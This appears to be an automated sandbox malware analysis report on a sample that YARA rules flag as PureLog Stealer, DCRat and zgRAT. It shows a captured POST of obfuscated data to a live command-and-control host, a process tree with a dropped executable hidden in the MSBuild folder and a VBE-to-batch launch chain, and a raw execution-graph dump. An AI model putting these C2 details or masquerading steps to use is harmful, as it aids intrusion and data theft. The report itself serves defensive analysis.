                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      79 | 192.168.2.4 | 49826 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:54:04.600178003 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:54:04.947957993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:54:04.948088884 CET | 2548 | OUT | Data Raw: 54 59 54 5c 5b 5d 55 5c 5e 57 5a 51 57 5e 50 5f 54 50 54 5c 56 54 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYT\[]U\^WZQW^P_TPT\VTW^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@,&W$#&$%:;<*X'8;\%!/ T5?+$$$/"/%Z"!Q*
                                                                                      Mar 6, 2024 09:54:05.323074102 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:54:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Target ID:0
                                                                                      Start time:09:51:51
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      Imagebase:0x360000
                                                                                      File size:2'730'343 bytes
                                                                                      MD5 hash:622AF327A5C66CA6D6D41BF02384B590
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:09:51:52
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe"
                                                                                      Imagebase:0xb60000
                                                                                      File size:147'456 bytes
                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:09:52:17
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:09:52:17
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:09:52:18
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\PortCommon/hyperbrokerhostNetsvc.exe
                                                                                      Imagebase:0x630000
                                                                                      File size:5'964'288 bytes
                                                                                      MD5 hash:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1922668864.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 92%, ReversingLabs
                                                                                      • Detection: 75%, Virustotal
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:09:52:21
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat"
                                                                                      Imagebase:0x7ff75cd90000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:09:52:22
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:09:52:22
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff73e0d0000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:09:52:22
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\w32tm.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      Imagebase:0x7ff7c2fd0000
                                                                                      File size:108'032 bytes
                                                                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:09:52:27
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe"
                                                                                      Imagebase:0xb0000
                                                                                      File size:5'964'288 bytes
                                                                                      MD5 hash:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 92%, ReversingLabs
                                                                                      • Detection: 75%, Virustotal
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:10%
                                                                                        Total number of Nodes:1521
                                                                                        Total number of Limit Nodes:43
23417->23418 23418->23387 23419->23386 23420->23389 23622 370863 23421->23622 23425 37df3d 23671 37ac16 23425->23671 23427 37df46 _abort 23428 37df59 GetCommandLineW 23427->23428 23429 37dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23428->23429 23430 37df68 23428->23430 23686 364092 23429->23686 23675 37c5c4 23430->23675 23436 37df76 OpenFileMappingW 23440 37dfd6 CloseHandle 23436->23440 23441 37df8f MapViewOfFile 23436->23441 23437 37dfe0 23680 37dbde 23437->23680 23440->23429 23443 37dfa0 __InternalCxxFrameHandler 23441->23443 23444 37dfcd UnmapViewOfFile 23441->23444 23448 37dbde 2 API calls 23443->23448 23444->23440 23449 37dfbc 23448->23449 23449->23444 23450 3790b7 8 API calls 23451 37e0aa DialogBoxParamW 23450->23451 23452 37e0e4 23451->23452 23453 37e0f6 Sleep 23452->23453 23454 37e0fd 23452->23454 23453->23454 23456 37e10b 23454->23456 23719 37ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23454->23719 23457 37e12a DeleteObject 23456->23457 23458 37e146 23457->23458 23459 37e13f DeleteObject 23457->23459 23460 37e177 23458->23460 23461 37e189 23458->23461 23459->23458 23720 37dc3b 6 API calls 23460->23720 23716 37ac7c 23461->23716 23463 37e17d CloseHandle 23463->23461 23465 37e1c3 23470 37f993 GetModuleHandleW 23465->23470 24003 387cd5 23466->24003 23469->23384 23470->23394 23471->23396 23472->23399 23473->23374 23475->23403 23488 383b07 23476->23488 23479 382a67 23479->23405 23481 382a6f 23482 382a7a 23481->23482 23502 383b43 DeleteCriticalSection 23481->23502 23482->23405 23531 38c05a 23484->23531 23487 382a7d 7 API calls 2 library calls 23487->23406 23489 383b10 23488->23489 23491 383b39 23489->23491 23492 382a63 23489->23492 23503 383d46 23489->23503 23508 383b43 DeleteCriticalSection 23491->23508 23492->23479 23494 382b8c 23492->23494 23524 383c57 23494->23524 23498 382baf 23499 382bbc 23498->23499 23530 382bbf 6 API calls ___vcrt_FlsFree 23498->23530 23499->23481 23501 382ba1 23501->23481 23502->23479 23509 383c0d 
23503->23509 23506 383d7e InitializeCriticalSectionAndSpinCount 23507 383d69 23506->23507 23507->23489 23508->23492 23510 383c26 23509->23510 23514 383c4f 23509->23514 23510->23514 23516 383b72 23510->23516 23513 383c3b GetProcAddress 23513->23514 23515 383c49 23513->23515 23514->23506 23514->23507 23515->23514 23517 383b7e ___vcrt_FlsGetValue 23516->23517 23518 383bf3 23517->23518 23519 383b95 LoadLibraryExW 23517->23519 23523 383bd5 LoadLibraryExW 23517->23523 23518->23513 23518->23514 23520 383bfa 23519->23520 23521 383bb3 GetLastError 23519->23521 23520->23518 23522 383c02 FreeLibrary 23520->23522 23521->23517 23522->23518 23523->23517 23523->23520 23525 383c0d ___vcrt_FlsGetValue 5 API calls 23524->23525 23526 383c71 23525->23526 23527 383c8a TlsAlloc 23526->23527 23528 382b96 23526->23528 23528->23501 23529 383d08 6 API calls ___vcrt_FlsGetValue 23528->23529 23529->23498 23530->23501 23534 38c077 23531->23534 23535 38c073 23531->23535 23533 37eefe 23533->23409 23533->23487 23534->23535 23537 38a6a0 23534->23537 23549 37fbbc 23535->23549 23538 38a6ac __FrameHandler3::FrameUnwindToState 23537->23538 23556 38ac31 EnterCriticalSection 23538->23556 23540 38a6b3 23557 38c528 23540->23557 23542 38a6c2 23548 38a6d1 23542->23548 23570 38a529 29 API calls 23542->23570 23545 38a6e2 _abort 23545->23534 23546 38a6cc 23571 38a5df GetStdHandle GetFileType 23546->23571 23572 38a6ed LeaveCriticalSection _abort 23548->23572 23550 37fbc5 IsProcessorFeaturePresent 23549->23550 23551 37fbc4 23549->23551 23553 37fc07 23550->23553 23551->23533 23621 37fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23553->23621 23555 37fcea 23555->23533 23556->23540 23558 38c534 __FrameHandler3::FrameUnwindToState 23557->23558 23559 38c558 23558->23559 23560 38c541 23558->23560 23573 38ac31 EnterCriticalSection 23559->23573 23581 3891a8 20 API calls _free 23560->23581 23563 38c564 23566 38c590 23563->23566 23574 38c479 23563->23574 23564 38c546 23582 
389087 26 API calls __cftof 23564->23582 23583 38c5b7 LeaveCriticalSection _abort 23566->23583 23567 38c550 _abort 23567->23542 23570->23546 23571->23548 23572->23545 23573->23563 23584 38b136 23574->23584 23576 38c48b 23580 38c498 23576->23580 23591 38af0a 23576->23591 23578 38c4ea 23578->23563 23598 388dcc 23580->23598 23581->23564 23582->23567 23583->23567 23589 38b143 _abort 23584->23589 23585 38b183 23605 3891a8 20 API calls _free 23585->23605 23586 38b16e RtlAllocateHeap 23587 38b181 23586->23587 23586->23589 23587->23576 23589->23585 23589->23586 23604 387a5e 7 API calls 2 library calls 23589->23604 23606 38ac98 23591->23606 23594 38af4f InitializeCriticalSectionAndSpinCount 23597 38af3a 23594->23597 23595 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23596 38af66 23595->23596 23596->23576 23597->23595 23599 388dd7 RtlFreeHeap 23598->23599 23603 388e00 _free 23598->23603 23600 388dec 23599->23600 23599->23603 23620 3891a8 20 API calls _free 23600->23620 23602 388df2 GetLastError 23602->23603 23603->23578 23604->23589 23605->23587 23607 38acc8 23606->23607 23611 38acc4 23606->23611 23607->23594 23607->23597 23608 38ace8 23608->23607 23610 38acf4 GetProcAddress 23608->23610 23612 38ad04 _abort 23610->23612 23611->23607 23611->23608 23613 38ad34 23611->23613 23612->23607 23614 38ad4a 23613->23614 23615 38ad55 LoadLibraryExW 23613->23615 23614->23611 23616 38ad8a 23615->23616 23617 38ad72 GetLastError 23615->23617 23616->23614 23618 38ada1 FreeLibrary 23616->23618 23617->23616 23619 38ad7d LoadLibraryExW 23617->23619 23618->23614 23619->23616 23620->23602 23621->23555 23721 37ec50 23622->23721 23625 3708e7 23627 370c14 GetModuleFileNameW 23625->23627 23732 3875fb 42 API calls __vsnwprintf_l 23625->23732 23626 370888 GetProcAddress 23628 3708a1 23626->23628 23629 3708b9 GetProcAddress 23626->23629 23638 370c32 23627->23638 23628->23629 23631 3708cb 23629->23631 23631->23625 23632 370b54 23632->23627 23633 370b5f GetModuleFileNameW 
CreateFileW 23632->23633 23634 370b8f SetFilePointer 23633->23634 23635 370c08 CloseHandle 23633->23635 23634->23635 23636 370b9d ReadFile 23634->23636 23635->23627 23636->23635 23640 370bbb 23636->23640 23641 370c94 GetFileAttributesW 23638->23641 23643 370c5d CompareStringW 23638->23643 23644 370cac 23638->23644 23723 36b146 23638->23723 23726 37081b 23638->23726 23640->23635 23642 37081b 2 API calls 23640->23642 23641->23638 23641->23644 23642->23640 23643->23638 23645 370cb7 23644->23645 23648 370cec 23644->23648 23647 370cd0 GetFileAttributesW 23645->23647 23649 370ce8 23645->23649 23646 370dfb 23670 37a64d GetCurrentDirectoryW 23646->23670 23647->23645 23647->23649 23648->23646 23650 36b146 GetVersionExW 23648->23650 23649->23648 23651 370d06 23650->23651 23652 370d73 23651->23652 23653 370d0d 23651->23653 23655 364092 _swprintf 51 API calls 23652->23655 23654 37081b 2 API calls 23653->23654 23656 370d17 23654->23656 23657 370d9b AllocConsole 23655->23657 23660 37081b 2 API calls 23656->23660 23658 370df3 ExitProcess 23657->23658 23659 370da8 GetCurrentProcessId AttachConsole 23657->23659 23737 383e13 23659->23737 23662 370d21 23660->23662 23733 36e617 23662->23733 23663 370dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23663->23658 23666 364092 _swprintf 51 API calls 23667 370d4f 23666->23667 23668 36e617 53 API calls 23667->23668 23669 370d5e 23668->23669 23669->23658 23670->23425 23672 37081b 2 API calls 23671->23672 23673 37ac2a OleInitialize 23672->23673 23674 37ac4d GdiplusStartup SHGetMalloc 23673->23674 23674->23427 23679 37c5ce 23675->23679 23676 37c6e4 23676->23436 23676->23437 23678 371fac CharUpperW 23678->23679 23679->23676 23679->23678 23762 36f3fa 82 API calls 2 library calls 23679->23762 23681 37ec50 23680->23681 23682 37dbeb SetEnvironmentVariableW 23681->23682 23684 37dc0e 23682->23684 23683 37dc36 23683->23429 23684->23683 23685 37dc2a SetEnvironmentVariableW 23684->23685 23685->23683 23763 364065 23686->23763 23689 37b6dd LoadBitmapW 
23690 37b6fe 23689->23690 23691 37b70b GetObjectW 23689->23691 23831 37a6c2 FindResourceW 23690->23831 23693 37b71a 23691->23693 23826 37a5c6 23693->23826 23697 37b770 23708 36da42 23697->23708 23698 37b74c 23845 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23698->23845 23699 37a6c2 12 API calls 23701 37b73d 23699->23701 23701->23698 23703 37b743 DeleteObject 23701->23703 23702 37b754 23846 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23702->23846 23703->23698 23705 37b75d 23847 37a80c 8 API calls 23705->23847 23707 37b764 DeleteObject 23707->23697 23858 36da67 23708->23858 23713 3790b7 23991 37eb38 23713->23991 23717 37acab GdiplusShutdown OleUninitialize 23716->23717 23717->23465 23719->23456 23720->23463 23722 37086d GetModuleHandleW 23721->23722 23722->23625 23722->23626 23724 36b196 23723->23724 23725 36b15a GetVersionExW 23723->23725 23724->23638 23725->23724 23727 37ec50 23726->23727 23728 370828 GetSystemDirectoryW 23727->23728 23729 370840 23728->23729 23730 37085e 23728->23730 23731 370851 LoadLibraryW 23729->23731 23730->23638 23731->23730 23732->23632 23734 36e627 23733->23734 23739 36e648 23734->23739 23738 383e1b 23737->23738 23738->23663 23738->23738 23745 36d9b0 23739->23745 23742 36e645 23742->23666 23743 36e66b LoadStringW 23743->23742 23744 36e682 LoadStringW 23743->23744 23744->23742 23750 36d8ec 23745->23750 23747 36d9cd 23749 36d9e2 23747->23749 23758 36d9f0 26 API calls 23747->23758 23749->23742 23749->23743 23751 36d904 23750->23751 23757 36d984 _strncpy 23750->23757 23753 36d928 23751->23753 23759 371da7 WideCharToMultiByte 23751->23759 23756 36d959 23753->23756 23760 36e5b1 50 API calls __vsnprintf 23753->23760 23761 386159 26 API calls 3 library calls 23756->23761 23757->23747 23758->23749 23759->23753 23760->23756 23761->23757 23762->23679 23764 36407c __vsnwprintf_l 23763->23764 23767 385fd4 23764->23767 23770 384097 23767->23770 23771 3840bf 23770->23771 23772 3840d7 23770->23772 23787 3891a8 20 API calls _free 23771->23787 
23772->23771 23774 3840df 23772->23774 23789 384636 23774->23789 23775 3840c4 23788 389087 26 API calls __cftof 23775->23788 23779 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23782 364086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23779->23782 23781 384167 23798 3849e6 51 API calls 3 library calls 23781->23798 23782->23689 23785 3840cf 23785->23779 23786 384172 23799 3846b9 20 API calls _free 23786->23799 23787->23775 23788->23785 23790 384653 23789->23790 23796 3840ef 23789->23796 23790->23796 23800 3897e5 GetLastError 23790->23800 23792 384674 23820 38993a 38 API calls __cftof 23792->23820 23794 38468d 23821 389967 38 API calls __cftof 23794->23821 23797 384601 20 API calls 2 library calls 23796->23797 23797->23781 23798->23786 23799->23785 23801 3897fb 23800->23801 23802 389801 23800->23802 23822 38ae5b 11 API calls 2 library calls 23801->23822 23804 38b136 _abort 20 API calls 23802->23804 23806 389850 SetLastError 23802->23806 23805 389813 23804->23805 23807 38981b 23805->23807 23823 38aeb1 11 API calls 2 library calls 23805->23823 23806->23792 23809 388dcc _free 20 API calls 23807->23809 23811 389821 23809->23811 23810 389830 23810->23807 23812 389837 23810->23812 23814 38985c SetLastError 23811->23814 23824 389649 20 API calls _abort 23812->23824 23825 388d24 38 API calls _abort 23814->23825 23815 389842 23817 388dcc _free 20 API calls 23815->23817 23819 389849 23817->23819 23819->23806 23819->23814 23820->23794 23821->23796 23822->23802 23823->23810 23824->23815 23848 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23826->23848 23828 37a5cd 23830 37a5d9 23828->23830 23849 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23828->23849 23830->23697 23830->23698 23830->23699 23832 37a6e5 SizeofResource 23831->23832 23833 37a7d3 23831->23833 23832->23833 23834 37a6fc LoadResource 23832->23834 23833->23691 23833->23693 23834->23833 23835 37a711 LockResource 23834->23835 23835->23833 23836 37a722 GlobalAlloc 23835->23836 
23836->23833 23837 37a73d GlobalLock 23836->23837 23838 37a7cc GlobalFree 23837->23838 23839 37a74c __InternalCxxFrameHandler 23837->23839 23838->23833 23840 37a7c5 GlobalUnlock 23839->23840 23850 37a626 GdipAlloc 23839->23850 23840->23838 23843 37a7b0 23843->23840 23844 37a79a GdipCreateHBITMAPFromBitmap 23844->23843 23845->23702 23846->23705 23847->23707 23848->23828 23849->23830 23851 37a645 23850->23851 23852 37a638 23850->23852 23851->23840 23851->23843 23851->23844 23854 37a3b9 23852->23854 23855 37a3e1 GdipCreateBitmapFromStream 23854->23855 23856 37a3da GdipCreateBitmapFromStreamICM 23854->23856 23857 37a3e6 23855->23857 23856->23857 23857->23851 23859 36da75 _wcschr __EH_prolog 23858->23859 23860 36daa4 GetModuleFileNameW 23859->23860 23861 36dad5 23859->23861 23862 36dabe 23860->23862 23904 3698e0 23861->23904 23862->23861 23864 36db31 23915 386310 23864->23915 23866 36e261 78 API calls 23869 36db05 23866->23869 23869->23864 23869->23866 23882 36dd4a 23869->23882 23870 36db44 23871 386310 26 API calls 23870->23871 23879 36db56 ___vcrt_FlsGetValue 23871->23879 23872 36dc85 23872->23882 23951 369d70 81 API calls 23872->23951 23876 36dc9f ___std_exception_copy 23877 369bd0 82 API calls 23876->23877 23876->23882 23880 36dcc8 ___std_exception_copy 23877->23880 23879->23872 23879->23882 23929 369e80 23879->23929 23945 369bd0 23879->23945 23950 369d70 81 API calls 23879->23950 23880->23882 23900 36dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 23880->23900 23952 371b84 MultiByteToWideChar 23880->23952 23938 36959a 23882->23938 23883 36e159 23890 36e1de 23883->23890 23958 388cce 26 API calls 2 library calls 23883->23958 23886 36e16e 23959 387625 26 API calls 2 library calls 23886->23959 23888 36e1c6 23960 36e27c 78 API calls 23888->23960 23889 36e214 23893 386310 26 API calls 23889->23893 23890->23889 23892 36e261 78 API calls 23890->23892 23892->23890 23894 36e22d 23893->23894 23895 386310 26 API calls 23894->23895 23895->23882 23897 371da7 
WideCharToMultiByte 23897->23900 23900->23882 23900->23883 23900->23897 23953 36e5b1 50 API calls __vsnprintf 23900->23953 23954 386159 26 API calls 3 library calls 23900->23954 23955 388cce 26 API calls 2 library calls 23900->23955 23956 387625 26 API calls 2 library calls 23900->23956 23957 36e27c 78 API calls 23900->23957 23902 36e29e GetModuleHandleW FindResourceW 23903 36da55 23902->23903 23903->23713 23905 3698ea 23904->23905 23906 36994b CreateFileW 23905->23906 23907 36996c GetLastError 23906->23907 23910 3699bb 23906->23910 23961 36bb03 23907->23961 23909 36998c 23909->23910 23912 369990 CreateFileW GetLastError 23909->23912 23911 3699ff 23910->23911 23913 3699e5 SetFileTime 23910->23913 23911->23869 23912->23910 23914 3699b5 23912->23914 23913->23911 23914->23910 23916 386349 23915->23916 23917 38634d 23916->23917 23928 386375 23916->23928 23965 3891a8 20 API calls _free 23917->23965 23919 386699 23922 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23919->23922 23920 386352 23966 389087 26 API calls __cftof 23920->23966 23923 3866a6 23922->23923 23923->23870 23924 38635d 23925 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23924->23925 23927 386369 23925->23927 23927->23870 23928->23919 23967 386230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23928->23967 23930 369e92 23929->23930 23935 369ea5 23929->23935 23931 369eb0 23930->23931 23968 366d5b 77 API calls 23930->23968 23931->23879 23932 369eb8 SetFilePointer 23932->23931 23934 369ed4 GetLastError 23932->23934 23934->23931 23936 369ede 23934->23936 23935->23931 23935->23932 23936->23931 23969 366d5b 77 API calls 23936->23969 23939 3695cf 23938->23939 23940 3695be 23938->23940 23939->23902 23940->23939 23941 3695d1 23940->23941 23942 3695ca 23940->23942 23975 369620 23941->23975 23970 36974e 23942->23970 23946 369bdc 23945->23946 23948 369be3 23945->23948 23946->23879 23948->23946 23949 369785 GetStdHandle ReadFile GetLastError 
GetLastError GetFileType 23948->23949 23990 366d1a 77 API calls 23948->23990 23949->23948 23950->23879 23951->23876 23952->23900 23953->23900 23954->23900 23955->23900 23956->23900 23957->23900 23958->23886 23959->23888 23960->23890 23962 36bb10 _wcslen 23961->23962 23963 36bbb8 GetCurrentDirectoryW 23962->23963 23964 36bb39 _wcslen 23962->23964 23963->23964 23964->23909 23965->23920 23966->23924 23967->23928 23968->23935 23969->23931 23971 369781 23970->23971 23972 369757 23970->23972 23971->23939 23972->23971 23981 36a1e0 23972->23981 23976 36964a 23975->23976 23977 36962c 23975->23977 23978 369669 23976->23978 23989 366bd5 76 API calls 23976->23989 23977->23976 23979 369638 FindCloseChangeNotification 23977->23979 23978->23939 23979->23976 23982 37ec50 23981->23982 23983 36a1ed DeleteFileW 23982->23983 23984 36a200 23983->23984 23985 36977f 23983->23985 23986 36bb03 GetCurrentDirectoryW 23984->23986 23985->23939 23987 36a214 23986->23987 23987->23985 23988 36a218 DeleteFileW 23987->23988 23988->23985 23989->23978 23990->23948 23993 37eb3d ___std_exception_copy 23991->23993 23992 3790d6 23992->23450 23993->23992 23996 37eb59 23993->23996 24000 387a5e 7 API calls 2 library calls 23993->24000 23995 37f5c9 24002 38238d RaiseException 23995->24002 23996->23995 24001 38238d RaiseException 23996->24001 23999 37f5e6 24000->23993 24001->23995 24002->23999 24004 387ce1 _abort 24003->24004 24005 387ce8 24004->24005 24006 387cfa 24004->24006 24039 387e2f GetModuleHandleW 24005->24039 24027 38ac31 EnterCriticalSection 24006->24027 24009 387ced 24009->24006 24040 387e73 GetModuleHandleExW 24009->24040 24010 387d9f 24028 387ddf 24010->24028 24013 387d76 24016 387d8e 24013->24016 24022 388a91 _abort 5 API calls 24013->24022 24023 388a91 _abort 5 API calls 24016->24023 24017 387de8 24049 392390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24017->24049 24018 387dbc 24031 387dee 24018->24031 24022->24016 24023->24010 24024 387d01 24024->24010 